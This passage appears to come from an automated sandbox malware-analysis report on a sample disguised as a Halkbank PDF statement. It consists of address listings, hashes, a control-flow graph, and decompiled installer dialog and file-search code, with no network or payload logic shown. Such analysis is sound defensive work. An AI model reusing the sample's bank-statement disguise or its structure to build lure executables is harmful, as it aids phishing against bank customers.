                                                                    0x004074f0
                                                                    0x004074f0
                                                                    0x004074f8
                                                                    0x004074fd
                                                                    0x004074ff
                                                                    0x00407502
                                                                    0x00407502
                                                                    0x0040751d
                                                                    0x00407524
                                                                    0x00000000
                                                                    0x00407526
                                                                    0x00000000
                                                                    0x00407526
                                                                    0x00000000
                                                                    0x004071c2
                                                                    0x004071c5
                                                                    0x004071fb
                                                                    0x0040732b
                                                                    0x0040732b
                                                                    0x0040732b
                                                                    0x0040732b
                                                                    0x0040732e
                                                                    0x0040732e
                                                                    0x00407331
                                                                    0x00407333
                                                                    0x004075bd
                                                                    0x00000000
                                                                    0x004075bd
                                                                    0x00407339
                                                                    0x0040733c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407342
                                                                    0x00407346
                                                                    0x00407349
                                                                    0x00407349
                                                                    0x00407349
                                                                    0x00000000
                                                                    0x00407349
                                                                    0x004071c7
                                                                    0x004071c9
                                                                    0x004071cb
                                                                    0x004071cd
                                                                    0x004071d0
                                                                    0x004071d1
                                                                    0x004071d3
                                                                    0x004071d5
                                                                    0x004071d8
                                                                    0x004071db
                                                                    0x004071f1
                                                                    0x004071f6
                                                                    0x0040722e
                                                                    0x0040722e
                                                                    0x00407232
                                                                    0x0040725e
                                                                    0x00407260
                                                                    0x00407267
                                                                    0x0040726a
                                                                    0x0040726d
                                                                    0x0040726d
                                                                    0x00407272
                                                                    0x00407272
                                                                    0x00407274
                                                                    0x00407277
                                                                    0x0040727e
                                                                    0x00407281
                                                                    0x004072ae
                                                                    0x004072ae
                                                                    0x004072b1
                                                                    0x004072b4
                                                                    0x00407328
                                                                    0x00407328
                                                                    0x00407328
                                                                    0x00000000
                                                                    0x00407328
                                                                    0x004072b6
                                                                    0x004072bc
                                                                    0x004072bf
                                                                    0x004072c2
                                                                    0x004072c5
                                                                    0x004072c8
                                                                    0x004072cb
                                                                    0x004072ce
                                                                    0x004072d1
                                                                    0x004072d4
                                                                    0x004072d7
                                                                    0x004072f0
                                                                    0x004072f2
                                                                    0x004072f5
                                                                    0x004072f6
                                                                    0x004072f9
                                                                    0x004072fb
                                                                    0x004072fe
                                                                    0x00407300
                                                                    0x00407302
                                                                    0x00407305
                                                                    0x00407307
                                                                    0x0040730a
                                                                    0x0040730e
                                                                    0x00407310
                                                                    0x00407310
                                                                    0x00407311
                                                                    0x00407314
                                                                    0x00407317
                                                                    0x004072d9
                                                                    0x004072d9
                                                                    0x004072e1
                                                                    0x004072e6
                                                                    0x004072e8
                                                                    0x004072eb
                                                                    0x004072eb
                                                                    0x0040731a
                                                                    0x00407321
                                                                    0x004072ab
                                                                    0x004072ab
                                                                    0x004072ab
                                                                    0x004072ab
                                                                    0x00000000
                                                                    0x00407323
                                                                    0x00000000
                                                                    0x00407323
                                                                    0x00407321
                                                                    0x00407234
                                                                    0x00407237
                                                                    0x00407239
                                                                    0x0040723c
                                                                    0x0040723f
                                                                    0x00407242
                                                                    0x00407244
                                                                    0x00407247
                                                                    0x0040724a
                                                                    0x0040724a
                                                                    0x0040724d
                                                                    0x0040724d
                                                                    0x00407250
                                                                    0x00407257
                                                                    0x0040722b
                                                                    0x0040722b
                                                                    0x0040722b
                                                                    0x0040722b
                                                                    0x00000000
                                                                    0x00407259
                                                                    0x00000000
                                                                    0x00407259
                                                                    0x00407257
                                                                    0x004071dd
                                                                    0x004071e0
                                                                    0x004071e2
                                                                    0x004071e5
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004070cf
                                                                    0x004070cf
                                                                    0x004070d3
                                                                    0x00407599
                                                                    0x00000000
                                                                    0x00407599
                                                                    0x004070d9
                                                                    0x004070dc
                                                                    0x004070df
                                                                    0x004070e2
                                                                    0x004070e4
                                                                    0x004070e4
                                                                    0x004070e4
                                                                    0x004070e7
                                                                    0x004070ea
                                                                    0x004070ed
                                                                    0x004070f0
                                                                    0x004070f3
                                                                    0x004070f6
                                                                    0x004070f7
                                                                    0x004070f9
                                                                    0x004070f9
                                                                    0x004070f9
                                                                    0x004070fc
                                                                    0x004070ff
                                                                    0x00407102
                                                                    0x00407105
                                                                    0x00407105
                                                                    0x00407105
                                                                    0x00407108
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040734c
                                                                    0x0040734c
                                                                    0x0040734c
                                                                    0x00407350
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407356
                                                                    0x00407359
                                                                    0x0040735c
                                                                    0x0040735f
                                                                    0x00407361
                                                                    0x00407361
                                                                    0x00407361
                                                                    0x00407364
                                                                    0x00407367
                                                                    0x0040736a
                                                                    0x0040736d
                                                                    0x00407370
                                                                    0x00407373
                                                                    0x00407374
                                                                    0x00407376
                                                                    0x00407376
                                                                    0x00407376
                                                                    0x00407379
                                                                    0x0040737c
                                                                    0x0040737f
                                                                    0x00407382
                                                                    0x00407385
                                                                    0x00407389
                                                                    0x0040738b
                                                                    0x0040738e
                                                                    0x00000000
                                                                    0x00407390
                                                                    0x00000000
                                                                    0x00407390
                                                                    0x0040738e
                                                                    0x004075c3
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406bf2

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.334852083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.334839900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334863585.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334993696.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                                                    • Instruction ID: 02c1e40b0c9780dd067322b7733c474732bd0f187a49f53fd7fd3c108ee94619
                                                                    • Opcode Fuzzy Hash: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                                                    • Instruction Fuzzy Hash: 7CF15570D04229CBDF28CFA8C8946ADBBB0FF44305F24816ED456BB281D7386A86DF45
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0040699E(WCHAR* _a4) {
                                                                    				void* _t2;
                                                                    
                                                                    				_t2 = FindFirstFileW(_a4, 0x426798); // executed
                                                                    				if(_t2 == 0xffffffff) {
                                                                    					return 0;
                                                                    				}
                                                                    				FindClose(_t2);
                                                                    				return 0x426798;
                                                                    			}




                                                                    0x004069a9
                                                                    0x004069b2
                                                                    0x00000000
                                                                    0x004069bf
                                                                    0x004069b5
                                                                    0x00000000

                                                                    APIs
                                                                    • FindFirstFileW.KERNELBASE(766DFAA0,00426798,00425F50,00406088,00425F50,00425F50,00000000,00425F50,00425F50,766DFAA0,?,766DF560,00405D94,?,766DFAA0,766DF560), ref: 004069A9
                                                                    • FindClose.KERNEL32(00000000), ref: 004069B5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.334852083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.334839900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334863585.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334993696.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                                    Similarity
                                                                    • API ID: Find$CloseFileFirst
                                                                    • String ID:
                                                                    • API String ID: 2295610775-0
                                                                    • Opcode ID: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                                                    • Instruction ID: 0ca7534fdffec89160a31ceabb6ef5ff718bfc83d1618d69d17f9e635378cbc3
                                                                    • Opcode Fuzzy Hash: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                                                    • Instruction Fuzzy Hash: 5ED012B15192205FC34057387E0C84B7A989F563317268A36B4AAF11E0CB348C3297AC
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 141 4040c5-4040d7 142 4040dd-4040e3 141->142 143 40423e-40424d 141->143 142->143 144 4040e9-4040f2 142->144 145 40429c-4042b1 143->145 146 40424f-40428a GetDlgItem * 2 call 4045c4 KiUserCallbackDispatcher call 40140b 143->146 149 4040f4-404101 SetWindowPos 144->149 150 404107-40410e 144->150 147 4042f1-4042f6 call 404610 145->147 148 4042b3-4042b6 145->148 167 40428f-404297 146->167 163 4042fb-404316 147->163 152 4042b8-4042c3 call 401389 148->152 153 4042e9-4042eb 148->153 149->150 155 404110-40412a ShowWindow 150->155 156 404152-404158 150->156 152->153 177 4042c5-4042e4 SendMessageW 152->177 153->147 162 404591 153->162 164 404130-404143 GetWindowLongW 155->164 165 40422b-404239 call 40462b 155->165 158 404171-404174 156->158 159 40415a-40416c DestroyWindow 156->159 169 404176-404182 SetWindowLongW 158->169 170 404187-40418d 158->170 166 40456e-404574 159->166 168 404593-40459a 162->168 173 404318-40431a call 40140b 163->173 174 40431f-404325 163->174 164->165 175 404149-40414c ShowWindow 164->175 165->168 166->162 180 404576-40457c 166->180 167->145 169->168 170->165 176 404193-4041a2 GetDlgItem 170->176 173->174 181 40432b-404336 174->181 182 40454f-404568 DestroyWindow EndDialog 174->182 175->156 184 4041c1-4041c4 176->184 185 4041a4-4041bb SendMessageW IsWindowEnabled 176->185 177->168 180->162 186 40457e-404587 ShowWindow 180->186 181->182 183 40433c-404389 call 4066a5 call 4045c4 * 3 GetDlgItem 181->183 182->166 213 404393-4043cf ShowWindow EnableWindow call 4045e6 EnableWindow 183->213 214 40438b-404390 183->214 188 4041c6-4041c7 184->188 189 4041c9-4041cc 184->189 185->162 185->184 186->162 191 4041f7-4041fc call 40459d 188->191 192 4041da-4041df 189->192 193 4041ce-4041d4 189->193 191->165 196 404215-404225 SendMessageW 192->196 198 4041e1-4041e7 192->198 193->196 197 4041d6-4041d8 193->197 196->165 197->191 201 4041e9-4041ef call 40140b 198->201 202 4041fe-404207 call 40140b 198->202 209 4041f5 201->209 202->165 211 404209-404213 202->211 209->191 211->209 217 4043d1-4043d2 213->217 218 4043d4 213->218 214->213 219 4043d6-404404 GetSystemMenu EnableMenuItem SendMessageW 217->219 218->219 220 404406-404417 SendMessageW 219->220 221 404419 219->221 222 40441f-40445e call 4045f9 call 4040a6 call 406668 lstrlenW call 4066a5 SetWindowTextW call 401389 220->222 221->222 222->163 233 404464-404466 222->233 233->163 234 40446c-404470 233->234 235 404472-404478 234->235 236 40448f-4044a3 DestroyWindow 234->236 235->162 237 40447e-404484 235->237 236->166 238 4044a9-4044d6 CreateDialogParamW 236->238 237->163 239 40448a 237->239 238->166 240 4044dc-404533 call 4045c4 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 238->240 239->162 240->162 245 404535-40454d ShowWindow call 404610 240->245 245->166
                                                                    C-Code - Quality: 84%
                                                                    			E004040C5(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
                                                                    				struct HWND__* _v28;
                                                                    				void* _v84;
                                                                    				void* _v88;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				signed int _t34;
                                                                    				signed int _t36;
                                                                    				signed int _t38;
                                                                    				struct HWND__* _t48;
                                                                    				signed int _t67;
                                                                    				struct HWND__* _t73;
                                                                    				signed int _t86;
                                                                    				struct HWND__* _t91;
                                                                    				signed int _t99;
                                                                    				int _t103;
                                                                    				signed int _t117;
                                                                    				int _t118;
                                                                    				int _t122;
                                                                    				signed int _t124;
                                                                    				struct HWND__* _t127;
                                                                    				struct HWND__* _t128;
                                                                    				int _t129;
                                                                    				intOrPtr _t130;
                                                                    				long _t133;
                                                                    				int _t135;
                                                                    				int _t136;
                                                                    				void* _t137;
                                                                    				void* _t145;
                                                                    
                                                                    				_t130 = _a8;
                                                                    				if(_t130 == 0x110 || _t130 == 0x408) {
                                                                    					_t34 = _a12;
                                                                    					_t127 = _a4;
                                                                    					__eflags = _t130 - 0x110;
                                                                    					 *0x423730 = _t34;
                                                                    					if(_t130 == 0x110) {
                                                                    						 *0x42a268 = _t127;
                                                                    						 *0x423744 = GetDlgItem(_t127, 1);
                                                                    						_t91 = GetDlgItem(_t127, 2);
                                                                    						_push(0xffffffff);
                                                                    						_push(0x1c);
                                                                    						 *0x421710 = _t91;
                                                                    						E004045C4(_t127);
                                                                    						SetClassLongW(_t127, 0xfffffff2,  *0x429248); // executed
                                                                    						 *0x42922c = E0040140B(4);
                                                                    						_t34 = 1;
                                                                    						__eflags = 1;
                                                                    						 *0x423730 = 1;
                                                                    					}
                                                                    					_t124 =  *0x40a39c; // 0x0
                                                                    					_t136 = 0;
                                                                    					_t133 = (_t124 << 6) +  *0x42a280;
                                                                    					__eflags = _t124;
                                                                    					if(_t124 < 0) {
                                                                    						L36:
                                                                    						E00404610(0x40b);
                                                                    						while(1) {
                                                                    							_t36 =  *0x423730;
                                                                    							 *0x40a39c =  *0x40a39c + _t36;
                                                                    							_t133 = _t133 + (_t36 << 6);
                                                                    							_t38 =  *0x40a39c; // 0x0
                                                                    							__eflags = _t38 -  *0x42a284;
                                                                    							if(_t38 ==  *0x42a284) {
                                                                    								E0040140B(1);
                                                                    							}
                                                                    							__eflags =  *0x42922c - _t136;
                                                                    							if( *0x42922c != _t136) {
                                                                    								break;
                                                                    							}
                                                                    							__eflags =  *0x40a39c -  *0x42a284; // 0x0
                                                                    							if(__eflags >= 0) {
                                                                    								break;
                                                                    							}
                                                                    							_t117 =  *(_t133 + 0x14);
                                                                    							E004066A5(_t117, _t127, _t133, 0x43a000,  *((intOrPtr*)(_t133 + 0x24)));
                                                                    							_push( *((intOrPtr*)(_t133 + 0x20)));
                                                                    							_push(0xfffffc19);
                                                                    							E004045C4(_t127);
                                                                    							_push( *((intOrPtr*)(_t133 + 0x1c)));
                                                                    							_push(0xfffffc1b);
                                                                    							E004045C4(_t127);
                                                                    							_push( *((intOrPtr*)(_t133 + 0x28)));
                                                                    							_push(0xfffffc1a);
                                                                    							E004045C4(_t127);
                                                                    							_t48 = GetDlgItem(_t127, 3);
                                                                    							__eflags =  *0x42a2ec - _t136;
                                                                    							_v28 = _t48;
                                                                    							if( *0x42a2ec != _t136) {
                                                                    								_t117 = _t117 & 0x0000fefd | 0x00000004;
                                                                    								__eflags = _t117;
                                                                    							}
                                                                    							ShowWindow(_t48, _t117 & 0x00000008);
                                                                    							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100);
                                                                    							E004045E6(_t117 & 0x00000002);
                                                                    							_t118 = _t117 & 0x00000004;
                                                                    							EnableWindow( *0x421710, _t118);
                                                                    							__eflags = _t118 - _t136;
                                                                    							if(_t118 == _t136) {
                                                                    								_push(1);
                                                                    							} else {
                                                                    								_push(_t136);
                                                                    							}
                                                                    							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
                                                                    							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
                                                                    							__eflags =  *0x42a2ec - _t136;
                                                                    							if( *0x42a2ec == _t136) {
                                                                    								_push( *0x423744);
                                                                    							} else {
                                                                    								SendMessageW(_t127, 0x401, 2, _t136);
                                                                    								_push( *0x421710);
                                                                    							}
                                                                    							E004045F9();
                                                                    							E00406668(0x423748, E004040A6());
                                                                    							E004066A5(0x423748, _t127, _t133,  &(0x423748[lstrlenW(0x423748)]),  *((intOrPtr*)(_t133 + 0x18)));
                                                                    							SetWindowTextW(_t127, 0x423748);
                                                                    							_push(_t136);
                                                                    							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
                                                                    							__eflags = _t67;
                                                                    							if(_t67 != 0) {
                                                                    								continue;
                                                                    							} else {
                                                                    								__eflags =  *_t133 - _t136;
                                                                    								if( *_t133 == _t136) {
                                                                    									continue;
                                                                    								}
                                                                    								__eflags =  *(_t133 + 4) - 5;
                                                                    								if( *(_t133 + 4) != 5) {
                                                                    									DestroyWindow( *0x429238);
                                                                    									 *0x422720 = _t133;
                                                                    									__eflags =  *_t133 - _t136;
                                                                    									if( *_t133 <= _t136) {
                                                                    										goto L60;
                                                                    									}
                                                                    									_t73 = CreateDialogParamW( *0x42a260,  *_t133 +  *0x429240 & 0x0000ffff, _t127,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133);
                                                                    									__eflags = _t73 - _t136;
                                                                    									 *0x429238 = _t73;
                                                                    									if(_t73 == _t136) {
                                                                    										goto L60;
                                                                    									}
                                                                    									_push( *((intOrPtr*)(_t133 + 0x2c)));
                                                                    									_push(6);
                                                                    									E004045C4(_t73);
                                                                    									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
                                                                    									ScreenToClient(_t127, _t137 + 0x10);
                                                                    									SetWindowPos( *0x429238, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
                                                                    									_push(_t136);
                                                                    									E00401389( *((intOrPtr*)(_t133 + 0xc)));
                                                                    									__eflags =  *0x42922c - _t136;
                                                                    									if( *0x42922c != _t136) {
                                                                    										goto L63;
                                                                    									}
                                                                    									ShowWindow( *0x429238, 8);
                                                                    									E00404610(0x405);
                                                                    									goto L60;
                                                                    								}
                                                                    								__eflags =  *0x42a2ec - _t136;
                                                                    								if( *0x42a2ec != _t136) {
                                                                    									goto L63;
                                                                    								}
                                                                    								__eflags =  *0x42a2e0 - _t136;
                                                                    								if( *0x42a2e0 != _t136) {
                                                                    									continue;
                                                                    								}
                                                                    								goto L63;
                                                                    							}
                                                                    						}
                                                                    						DestroyWindow( *0x429238); // executed
                                                                    						 *0x42a268 = _t136;
                                                                    						EndDialog(_t127,  *0x421f18);
                                                                    						goto L60;
                                                                    					} else {
                                                                    						__eflags = _t34 - 1;
                                                                    						if(_t34 != 1) {
                                                                    							L35:
                                                                    							__eflags =  *_t133 - _t136;
                                                                    							if( *_t133 == _t136) {
                                                                    								goto L63;
                                                                    							}
                                                                    							goto L36;
                                                                    						}
                                                                    						_push(0);
                                                                    						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
                                                                    						__eflags = _t86;
                                                                    						if(_t86 == 0) {
                                                                    							goto L35;
                                                                    						}
                                                                    						SendMessageW( *0x429238, 0x40f, 0, 1);
                                                                    						__eflags =  *0x42922c;
                                                                    						return 0 |  *0x42922c == 0x00000000;
                                                                    					}
                                                                    				} else {
                                                                    					_t127 = _a4;
                                                                    					_t136 = 0;
                                                                    					if(_t130 == 0x47) {
                                                                    						SetWindowPos( *0x423728, _t127, 0, 0, 0, 0, 0x13);
                                                                    					}
                                                                    					_t122 = _a12;
                                                                    					if(_t130 != 5) {
                                                                    						L8:
                                                                    						if(_t130 != 0x40d) {
                                                                    							__eflags = _t130 - 0x11;
                                                                    							if(_t130 != 0x11) {
                                                                    								__eflags = _t130 - 0x111;
                                                                    								if(_t130 != 0x111) {
                                                                    									goto L28;
                                                                    								}
                                                                    								_t135 = _t122 & 0x0000ffff;
                                                                    								_t128 = GetDlgItem(_t127, _t135);
                                                                    								__eflags = _t128 - _t136;
                                                                    								if(_t128 == _t136) {
                                                                    									L15:
                                                                    									__eflags = _t135 - 1;
                                                                    									if(_t135 != 1) {
                                                                    										__eflags = _t135 - 3;
                                                                    										if(_t135 != 3) {
                                                                    											_t129 = 2;
                                                                    											__eflags = _t135 - _t129;
                                                                    											if(_t135 != _t129) {
                                                                    												L27:
                                                                    												SendMessageW( *0x429238, 0x111, _t122, _a16);
                                                                    												goto L28;
                                                                    											}
                                                                    											__eflags =  *0x42a2ec - _t136;
                                                                    											if( *0x42a2ec == _t136) {
                                                                    												_t99 = E0040140B(3);
                                                                    												__eflags = _t99;
                                                                    												if(_t99 != 0) {
                                                                    													goto L28;
                                                                    												}
                                                                    												 *0x421f18 = 1;
                                                                    												L23:
                                                                    												_push(0x78);
                                                                    												L24:
                                                                    												E0040459D();
                                                                    												goto L28;
                                                                    											}
                                                                    											E0040140B(_t129);
                                                                    											 *0x421f18 = _t129;
                                                                    											goto L23;
                                                                    										}
                                                                    										__eflags =  *0x40a39c - _t136; // 0x0
                                                                    										if(__eflags <= 0) {
                                                                    											goto L27;
                                                                    										}
                                                                    										_push(0xffffffff);
                                                                    										goto L24;
                                                                    									}
                                                                    									_push(_t135);
                                                                    									goto L24;
                                                                    								}
                                                                    								SendMessageW(_t128, 0xf3, _t136, _t136);
                                                                    								_t103 = IsWindowEnabled(_t128);
                                                                    								__eflags = _t103;
                                                                    								if(_t103 == 0) {
                                                                    									L63:
                                                                    									return 0;
                                                                    								}
                                                                    								goto L15;
                                                                    							}
                                                                    							SetWindowLongW(_t127, _t136, _t136);
                                                                    							return 1;
                                                                    						}
                                                                    						DestroyWindow( *0x429238);
                                                                    						 *0x429238 = _t122;
                                                                    						L60:
                                                                    						_t145 =  *0x425748 - _t136; // 0x0
                                                                    						if(_t145 == 0 &&  *0x429238 != _t136) {
                                                                    							ShowWindow(_t127, 0xa);
                                                                    							 *0x425748 = 1;
                                                                    						}
                                                                    						goto L63;
                                                                    					} else {
                                                                    						asm("sbb eax, eax");
                                                                    						ShowWindow( *0x423728,  ~(_t122 - 1) & 0x00000005);
                                                                    						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
                                                                    							L28:
                                                                    							return E0040462B(_a8, _t122, _a16);
                                                                    						} else {
                                                                    							ShowWindow(_t127, 4);
                                                                    							goto L8;
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    			}
































                                                                    0x004040d0
                                                                    0x004040d7
                                                                    0x0040423e
                                                                    0x00404242
                                                                    0x00404246
                                                                    0x00404248
                                                                    0x0040424d
                                                                    0x00404258
                                                                    0x00404263
                                                                    0x00404268
                                                                    0x0040426a
                                                                    0x0040426c
                                                                    0x0040426f
                                                                    0x00404274
                                                                    0x00404282
                                                                    0x0040428f
                                                                    0x00404296
                                                                    0x00404296
                                                                    0x00404297
                                                                    0x00404297
                                                                    0x0040429c
                                                                    0x004042a2
                                                                    0x004042a9
                                                                    0x004042af
                                                                    0x004042b1
                                                                    0x004042f1
                                                                    0x004042f6
                                                                    0x004042fb
                                                                    0x004042fb
                                                                    0x00404300
                                                                    0x00404309
                                                                    0x0040430b
                                                                    0x00404310
                                                                    0x00404316
                                                                    0x0040431a
                                                                    0x0040431a
                                                                    0x0040431f
                                                                    0x00404325
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00404330
                                                                    0x00404336
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040433f
                                                                    0x00404347
                                                                    0x0040434c
                                                                    0x0040434f
                                                                    0x00404355
                                                                    0x0040435a
                                                                    0x0040435d
                                                                    0x00404363
                                                                    0x00404368
                                                                    0x0040436b
                                                                    0x00404371
                                                                    0x00404379
                                                                    0x0040437f
                                                                    0x00404385
                                                                    0x00404389
                                                                    0x00404390
                                                                    0x00404390
                                                                    0x00404390
                                                                    0x0040439a
                                                                    0x004043ac
                                                                    0x004043b8
                                                                    0x004043bd
                                                                    0x004043c7
                                                                    0x004043cd
                                                                    0x004043cf
                                                                    0x004043d4
                                                                    0x004043d1
                                                                    0x004043d1
                                                                    0x004043d1
                                                                    0x004043e4
                                                                    0x004043fc
                                                                    0x004043fe
                                                                    0x00404404
                                                                    0x00404419
                                                                    0x00404406
                                                                    0x0040440f
                                                                    0x00404411
                                                                    0x00404411
                                                                    0x0040441f
                                                                    0x00404430
                                                                    0x00404446
                                                                    0x0040444d
                                                                    0x00404453
                                                                    0x00404457
                                                                    0x0040445c
                                                                    0x0040445e
                                                                    0x00000000
                                                                    0x00404464
                                                                    0x00404464
                                                                    0x00404466
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040446c
                                                                    0x00404470
                                                                    0x00404495
                                                                    0x0040449b
                                                                    0x004044a1
                                                                    0x004044a3
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004044c9
                                                                    0x004044cf
                                                                    0x004044d1
                                                                    0x004044d6
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004044dc
                                                                    0x004044df
                                                                    0x004044e2
                                                                    0x004044f9
                                                                    0x00404505
                                                                    0x0040451e
                                                                    0x00404524
                                                                    0x00404528
                                                                    0x0040452d
                                                                    0x00404533
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040453d
                                                                    0x00404548
                                                                    0x00000000
                                                                    0x00404548
                                                                    0x00404472
                                                                    0x00404478
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040447e
                                                                    0x00404484
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040448a
                                                                    0x0040445e
                                                                    0x00404555
                                                                    0x00404561
                                                                    0x00404568
                                                                    0x00000000
                                                                    0x004042b3
                                                                    0x004042b3
                                                                    0x004042b6
                                                                    0x004042e9
                                                                    0x004042e9
                                                                    0x004042eb
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004042eb
                                                                    0x004042b8
                                                                    0x004042bc
                                                                    0x004042c1
                                                                    0x004042c3
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004042d3
                                                                    0x004042db
                                                                    0x00000000
                                                                    0x004042e1
                                                                    0x004040e9
                                                                    0x004040e9
                                                                    0x004040ed
                                                                    0x004040f2
                                                                    0x00404101
                                                                    0x00404101
                                                                    0x00404107
                                                                    0x0040410e
                                                                    0x00404152
                                                                    0x00404158
                                                                    0x00404171
                                                                    0x00404174
                                                                    0x00404187
                                                                    0x0040418d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00404193
                                                                    0x0040419e
                                                                    0x004041a0
                                                                    0x004041a2
                                                                    0x004041c1
                                                                    0x004041c1
                                                                    0x004041c4
                                                                    0x004041c9
                                                                    0x004041cc
                                                                    0x004041dc
                                                                    0x004041dd
                                                                    0x004041df
                                                                    0x00404215
                                                                    0x00404225
                                                                    0x00000000
                                                                    0x00404225
                                                                    0x004041e1
                                                                    0x004041e7
                                                                    0x00404200
                                                                    0x00404205
                                                                    0x00404207
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00404209
                                                                    0x004041f5
                                                                    0x004041f5
                                                                    0x004041f7
                                                                    0x004041f7
                                                                    0x00000000
                                                                    0x004041f7
                                                                    0x004041ea
                                                                    0x004041ef
                                                                    0x00000000
                                                                    0x004041ef
                                                                    0x004041ce
                                                                    0x004041d4
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004041d6
                                                                    0x00000000
                                                                    0x004041d6
                                                                    0x004041c6
                                                                    0x00000000
                                                                    0x004041c6
                                                                    0x004041ac
                                                                    0x004041b3
                                                                    0x004041b9
                                                                    0x004041bb
                                                                    0x00404591
                                                                    0x00000000
                                                                    0x00404591
                                                                    0x00000000
                                                                    0x004041bb
                                                                    0x00404179
                                                                    0x00000000
                                                                    0x00404181
                                                                    0x00404160
                                                                    0x00404166
                                                                    0x0040456e
                                                                    0x0040456e
                                                                    0x00404574
                                                                    0x00404581
                                                                    0x00404587
                                                                    0x00404587
                                                                    0x00000000
                                                                    0x00404110
                                                                    0x00404115
                                                                    0x00404121
                                                                    0x0040412a
                                                                    0x0040422b
                                                                    0x00000000
                                                                    0x00404149
                                                                    0x0040414c
                                                                    0x00000000
                                                                    0x0040414c
                                                                    0x0040412a
                                                                    0x0040410e

                                                                    APIs
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404101
                                                                    • ShowWindow.USER32(?), ref: 00404121
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00404133
                                                                    • ShowWindow.USER32(?,00000004), ref: 0040414C
                                                                    • DestroyWindow.USER32 ref: 00404160
                                                                    • SetWindowLongW.USER32 ref: 00404179
                                                                    • GetDlgItem.USER32 ref: 00404198
                                                                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041AC
